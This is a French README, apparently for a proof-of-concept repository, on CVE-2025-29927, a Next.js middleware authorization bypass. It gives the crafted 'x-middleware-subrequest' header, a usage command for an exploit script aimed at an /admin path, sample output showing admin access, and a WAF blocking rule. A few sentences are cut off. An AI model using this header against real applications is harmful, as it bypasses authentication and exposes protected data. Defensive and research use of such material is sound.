
Voici un exploit simple mais efficace pour CVE-2025-29927.
Ce dépôt contient une Preuve de Concept (PoC) pour l'exploitation de CVE-2025-29927, une vulnérabilité critique dans Next.js qui permet à des attaquants de contourner les contrôles d'autorisation en abusant d'un en-tête HTTP spécifique au middleware.
Les applications Next.js s'appuient souvent sur le middleware pour l'autorisation et le contrôle d'accès. Cette CVE découle d'un défaut logique dans la façon dont l'en-tête x-middleware-subrequest est traité. Lorsque cet en-tête est défini sur middleware, le serveur peut supposer à tort que la requête provient d'une logique interne et .
Cela peut permettre aux attaquants d'accéder à des panneaux d'administration, des API protégées ou des données utilisateur — sans identifiants ni session valide.
Nous fournissons un script Python simple pour tester si une application Next.js est vulnérable.
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
[+] Envoi de la requête à : https://target.com/admin
[+] Utilisation de l'en-tête : x-middleware-subrequest: middleware
[+] Code de statut : 200
[+] Corps de la réponse (500 premiers caractères) :
<!DOCTYPE html><html><head>...Vous êtes connecté en tant qu'admin...
x-middleware-subrequest comme signal de confiance.Logique WAF :
if header 'x-middleware-subrequest' == 'middleware':
block_request()
Cette PoC a été développée par l'équipe de sécurité offensive de W2H Corp. dans le cadre de nos efforts continus de recherche en vulnérabilités. L'article original expliquant la CVE se trouve ici.